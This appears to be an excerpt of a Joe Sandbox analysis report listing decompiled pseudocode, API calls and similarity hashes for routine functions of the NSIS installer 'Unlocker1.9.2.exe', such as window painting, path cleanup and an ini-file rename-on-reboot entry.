                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403DB1(int _a4) {
                                                                                                                                                              				int _t2;
                                                                                                                                                              
                                                                                                                                                              				_t2 = EnableWindow( *0x420470, _a4); // executed
                                                                                                                                                              				return _t2;
                                                                                                                                                              			}





                                                                                                                                                              APIs
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403B8E), ref: 00403DBB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                              • Opcode ID: 3d2371042bc9023e882d1747a0204cba7e5e06de41843067423b9fd361121a1b
                                                                                                                                                              • Instruction ID: b3b70422baabf746d7f85ff150f7fad2421cb985b3c304c2f0a1b2ed4b2bd08a
                                                                                                                                                              • Opcode Fuzzy Hash: 3d2371042bc9023e882d1747a0204cba7e5e06de41843067423b9fd361121a1b
                                                                                                                                                              • Instruction Fuzzy Hash: A2A00275515100DBCA115B50DE048057A61B754705F41D475B2455017587315461EB5A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004054FB(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                              				CHAR* _t3;
                                                                                                                                                              				char _t4;
                                                                                                                                                              
                                                                                                                                                              				_t3 = _a4;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t4 =  *_t3;
                                                                                                                                                              					if(_t4 == 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					if(_t4 != _a8) {
                                                                                                                                                              						_t3 = CharNextA(_t3); // executed
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					break;
                                                                                                                                                              				}
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • CharNextA.USER32(?,00403176,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000020), ref: 00405508
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3213498283-0
                                                                                                                                                              • Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                                                                                              • Instruction ID: 4d956687522218a8d382f60df26940a2f5368e95d4cbeb2580b699aececf1af3
                                                                                                                                                              • Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                                                                                              • Instruction Fuzzy Hash: 9BC0806440C54077C5105B204C344677FE5AA91745F249897F4C163155C134A840CB3B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 39%
                                                                                                                                                              			E0040263E(char __ebx, char* __edi, char* __esi) {
                                                                                                                                                              				void* _t19;
                                                                                                                                                              
                                                                                                                                                              				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                                                                                                              					E0040593B(__edi, _t6);
                                                                                                                                                              					_push(_t19 - 0x178);
                                                                                                                                                              					_push(__esi);
                                                                                                                                                              					E004059DD();
                                                                                                                                                              				} else {
                                                                                                                                                              					 *__edi = __ebx;
                                                                                                                                                              					 *__esi = __ebx;
                                                                                                                                                              					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t19 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}





                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                              • Opcode ID: 7ce125ca612887df162c36b751337e4c26a37c050d4ffda7300b23609ce4967c
                                                                                                                                                              • Instruction ID: 14dcf34609860af9969e045d3f077fc7a18bb2554c958aa599433bfc977b1d94
                                                                                                                                                              • Opcode Fuzzy Hash: 7ce125ca612887df162c36b751337e4c26a37c050d4ffda7300b23609ce4967c
                                                                                                                                                              • Instruction Fuzzy Hash: 86F0E572A04101DFD700EBB49E49AEEB778DF51328FA0067BF101F20C1D2B84A45DB2A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                                                              				struct tagLOGBRUSH _v16;
                                                                                                                                                              				struct tagRECT _v32;
                                                                                                                                                              				struct tagPAINTSTRUCT _v96;
                                                                                                                                                              				struct HDC__* _t70;
                                                                                                                                                              				struct HBRUSH__* _t87;
                                                                                                                                                              				struct HFONT__* _t94;
                                                                                                                                                              				long _t102;
                                                                                                                                                              				intOrPtr _t115;
                                                                                                                                                              				signed int _t126;
                                                                                                                                                              				struct HDC__* _t128;
                                                                                                                                                              				intOrPtr _t130;
                                                                                                                                                              
                                                                                                                                                              				if(_a8 == 0xf) {
                                                                                                                                                              					_t130 =  *0x423e90; // 0x73eeb0
                                                                                                                                                              					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                                                              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                                                              					_a8 = _t70;
                                                                                                                                                              					GetClientRect(_a4,  &_v32);
                                                                                                                                                              					_t126 = _v32.bottom;
                                                                                                                                                              					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                                                              					while(_v32.top < _t126) {
                                                                                                                                                              						_a12 = _t126 - _v32.top;
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                                                              						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                                                              						_v32.bottom = _v32.bottom + 4;
                                                                                                                                                              						_a16 = _t87;
                                                                                                                                                              						FillRect(_a8,  &_v32, _t87);
                                                                                                                                                              						DeleteObject(_a16);
                                                                                                                                                              						_v32.top = _v32.top + 4;
                                                                                                                                                              					}
                                                                                                                                                              					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                                                              						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                                                                                              						_a16 = _t94;
                                                                                                                                                              						if(_t94 != 0) {
                                                                                                                                                              							_t128 = _a8;
                                                                                                                                                              							_v32.left = 0x10;
                                                                                                                                                              							_v32.top = 8;
                                                                                                                                                              							SetBkMode(_t128, 1);
                                                                                                                                                              							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                                                              							_a8 = SelectObject(_t128, _a16);
                                                                                                                                                              							DrawTextA(_t128, "Unlocker 1.9.2 Setup", 0xffffffff,  &_v32, 0x820);
                                                                                                                                                              							SelectObject(_t128, _a8);
                                                                                                                                                              							DeleteObject(_a16);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					EndPaint(_a4,  &_v96);
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t102 = _a16;
                                                                                                                                                              				if(_a8 == 0x46) {
                                                                                                                                                              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                                                              					_t115 =  *0x423e88; // 0x0
                                                                                                                                                              					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                                                                                                                                              				}
                                                                                                                                                              				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                                                                                              			}














                                                                                                                                                              0x00401110
                                                                                                                                                              0x0040116e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401178
                                                                                                                                                              0x00401010
                                                                                                                                                              0x00401013
                                                                                                                                                              0x00401015
                                                                                                                                                              0x00401019
                                                                                                                                                              0x0040101f
                                                                                                                                                              0x0040101f
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                              • FillRect.USER32 ref: 004010E4
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                              • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                              • DrawTextA.USER32(00000000,Unlocker 1.9.2 Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                              • String ID: F$Unlocker 1.9.2 Setup
                                                                                                                                                              • API String ID: 941294808-1352916206
                                                                                                                                                              • Opcode ID: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                                                                                              • Instruction ID: 87972a138d556bacb88ba9c7fcdf6f47da3ec758f00315b8b39b68d2b09e4b9a
                                                                                                                                                              • Opcode Fuzzy Hash: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                                                                                              • Instruction Fuzzy Hash: 6441BC71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C378EA54DFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E0040572B() {
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				intOrPtr* _t15;
                                                                                                                                                              				long _t16;
                                                                                                                                                              				intOrPtr _t18;
                                                                                                                                                              				int _t20;
                                                                                                                                                              				void* _t28;
                                                                                                                                                              				long _t29;
                                                                                                                                                              				intOrPtr* _t37;
                                                                                                                                                              				int _t43;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              				long _t47;
                                                                                                                                                              				CHAR* _t49;
                                                                                                                                                              				void* _t51;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              				intOrPtr* _t54;
                                                                                                                                                              				void* _t55;
                                                                                                                                                              				void* _t56;
                                                                                                                                                              
                                                                                                                                                              				_t15 = E00405CFF(1);
                                                                                                                                                              				_t49 =  *(_t55 + 0x18);
                                                                                                                                                              				if(_t15 != 0) {
                                                                                                                                                              					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                                                                                                                              					if(_t20 != 0) {
                                                                                                                                                              						L16:
                                                                                                                                                              						 *0x423f10 =  *0x423f10 + 1;
                                                                                                                                                              						return _t20;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *0x422608 = 0x4c554e;
                                                                                                                                                              				if(_t49 == 0) {
                                                                                                                                                              					L5:
                                                                                                                                                              					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422080, 0x400);
                                                                                                                                                              					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                                                                                              						_t43 = wsprintfA(0x421c80, "%s=%s\r\n", 0x422608, 0x422080);
                                                                                                                                                              						_t18 =  *0x423e90; // 0x73eeb0
                                                                                                                                                              						_t56 = _t55 + 0x10;
                                                                                                                                                              						E004059FF(_t43, 0x400, 0x422080, 0x422080,  *((intOrPtr*)(_t18 + 0x128)));
                                                                                                                                                              						_t20 = E004056B4(0x422080, 0xc0000000, 4);
                                                                                                                                                              						_t53 = _t20;
                                                                                                                                                              						 *(_t56 + 0x14) = _t53;
                                                                                                                                                              						if(_t53 == 0xffffffff) {
                                                                                                                                                              							goto L16;
                                                                                                                                                              						}
                                                                                                                                                              						_t47 = GetFileSize(_t53, 0);
                                                                                                                                                              						_t7 = _t43 + 0xa; // 0xa
                                                                                                                                                              						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                                                                                                                              						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                                                                                                                              							L15:
                                                                                                                                                              							_t20 = CloseHandle(_t53);
                                                                                                                                                              							goto L16;
                                                                                                                                                              						} else {
                                                                                                                                                              							if(E00405629(_t51, "[Rename]\r\n") != 0) {
                                                                                                                                                              								_t28 = E00405629(_t26 + 0xa, 0x409330);
                                                                                                                                                              								if(_t28 == 0) {
                                                                                                                                                              									L13:
                                                                                                                                                              									_t29 = _t47;
                                                                                                                                                              									L14:
                                                                                                                                                              									E00405675(_t51 + _t29, 0x421c80, _t43);
                                                                                                                                                              									SetFilePointer(_t53, 0, 0, 0);
                                                                                                                                                              									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                                                                                                                              									GlobalFree(_t51);
                                                                                                                                                              									goto L15;
                                                                                                                                                              								}
                                                                                                                                                              								_t37 = _t28 + 1;
                                                                                                                                                              								_t44 = _t51 + _t47;
                                                                                                                                                              								_t54 = _t37;
                                                                                                                                                              								if(_t37 >= _t44) {
                                                                                                                                                              									L21:
                                                                                                                                                              									_t53 =  *(_t56 + 0x14);
                                                                                                                                                              									_t29 = _t37 - _t51;
                                                                                                                                                              									goto L14;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L20;
                                                                                                                                                              								}
                                                                                                                                                              								do {
                                                                                                                                                              									L20:
                                                                                                                                                              									 *((char*)(_t43 + _t54)) =  *_t54;
                                                                                                                                                              									_t54 = _t54 + 1;
                                                                                                                                                              								} while (_t54 < _t44);
                                                                                                                                                              								goto L21;
                                                                                                                                                              							}
                                                                                                                                                              							E004059DD(_t51 + _t47, "[Rename]\r\n");
                                                                                                                                                              							_t47 = _t47 + 0xa;
                                                                                                                                                              							goto L13;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					CloseHandle(E004056B4(_t49, 0, 1));
                                                                                                                                                              					_t16 = GetShortPathNameA(_t49, 0x422608, 0x400);
                                                                                                                                                              					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                                                                                              						goto L5;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t16;
                                                                                                                                                              			}























                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                                                                • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                                                                • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054C0,?,00000000,000000F1,?), ref: 00405778
                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00405781
                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 0040579E
                                                                                                                                                              • wsprintfA.USER32 ref: 004057BC
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00422080,C0000000,00000004,00422080,?,?,?,00000000,000000F1,?), ref: 004057F7
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405806
                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040581C
                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421C80,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405862
                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405874
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 0040587B
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405882
                                                                                                                                                                • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                                                                                                • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                                                                              • String ID: %s=%s$[Rename]
                                                                                                                                                              • API String ID: 3772915668-1727408572
                                                                                                                                                              • Opcode ID: fde17059b73e5ed387f221ca3ca0721057c187c9f22db8a501a216d306c9fcdb
                                                                                                                                                              • Instruction ID: 243778ea09c2d6121d89995a0746b628a30f71b2b4e684d8516dd3187c24d480
                                                                                                                                                              • Opcode Fuzzy Hash: fde17059b73e5ed387f221ca3ca0721057c187c9f22db8a501a216d306c9fcdb
                                                                                                                                                              • Instruction Fuzzy Hash: 0E412032A05B067BE3207B619C48F6B3A5CEB40754F004436FD05F62D2EA38A8018ABE
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405C3F(CHAR* _a4) {
                                                                                                                                                              				char _t5;
                                                                                                                                                              				char _t7;
                                                                                                                                                              				char* _t15;
                                                                                                                                                              				char* _t16;
                                                                                                                                                              				CHAR* _t17;
                                                                                                                                                              
                                                                                                                                                              				_t17 = _a4;
                                                                                                                                                              				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                                                                                              					_t17 =  &(_t17[4]);
                                                                                                                                                              				}
                                                                                                                                                              				if( *_t17 != 0 && E0040553D(_t17) != 0) {
                                                                                                                                                              					_t17 =  &(_t17[2]);
                                                                                                                                                              				}
                                                                                                                                                              				_t5 =  *_t17;
                                                                                                                                                              				_t15 = _t17;
                                                                                                                                                              				_t16 = _t17;
                                                                                                                                                              				if(_t5 != 0) {
                                                                                                                                                              					do {
                                                                                                                                                              						if(_t5 > 0x1f &&  *((char*)(E004054FB("*?|<>/\":", _t5))) == 0) {
                                                                                                                                                              							E00405675(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                                                                                              							_t16 = CharNextA(_t16);
                                                                                                                                                              						}
                                                                                                                                                              						_t17 = CharNextA(_t17);
                                                                                                                                                              						_t5 =  *_t17;
                                                                                                                                                              					} while (_t5 != 0);
                                                                                                                                                              				}
                                                                                                                                                              				 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t16 = CharPrevA(_t15, _t16);
                                                                                                                                                              					_t7 =  *_t16;
                                                                                                                                                              					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                              					if(_t15 < _t16) {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					break;
                                                                                                                                                              				}
                                                                                                                                                              				return _t7;
                                                                                                                                                              			}


                                                                                                                                                              APIs
                                                                                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                                                              • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                                                              • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 589700163-3390710162
                                                                                                                                                              • Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                                                                                                                                              • Instruction ID: 6e21827f4117d195ccc2fee92ee9dbca2865e9be55a4e6ca6148cbd3e4a13511
                                                                                                                                                              • Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                                                                                                                                              • Instruction Fuzzy Hash: F011905580CB942AFB3206384C48B776F99CB67764F58407BE8C4723C2D67C5C429B6D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403DF6(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                                                              				struct tagLOGBRUSH _v16;
                                                                                                                                                              				long _t35;
                                                                                                                                                              				long _t37;
                                                                                                                                                              				void* _t40;
                                                                                                                                                              				long* _t49;
                                                                                                                                                              
                                                                                                                                                              				if(_a4 + 0xfffffecd > 5) {
                                                                                                                                                              					L15:
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                                                                                              				if(_t49 == 0) {
                                                                                                                                                              					goto L15;
                                                                                                                                                              				}
                                                                                                                                                              				_t35 =  *_t49;
                                                                                                                                                              				if((_t49[5] & 0x00000002) != 0) {
                                                                                                                                                              					_t35 = GetSysColor(_t35);
                                                                                                                                                              				}
                                                                                                                                                              				if((_t49[5] & 0x00000001) != 0) {
                                                                                                                                                              					SetTextColor(_a8, _t35);
                                                                                                                                                              				}
                                                                                                                                                              				SetBkMode(_a8, _t49[4]);
                                                                                                                                                              				_t37 = _t49[1];
                                                                                                                                                              				_v16.lbColor = _t37;
                                                                                                                                                              				if((_t49[5] & 0x00000008) != 0) {
                                                                                                                                                              					_t37 = GetSysColor(_t37);
                                                                                                                                                              					_v16.lbColor = _t37;
                                                                                                                                                              				}
                                                                                                                                                              				if((_t49[5] & 0x00000004) != 0) {
                                                                                                                                                              					SetBkColor(_a8, _t37);
                                                                                                                                                              				}
                                                                                                                                                              				if((_t49[5] & 0x00000010) != 0) {
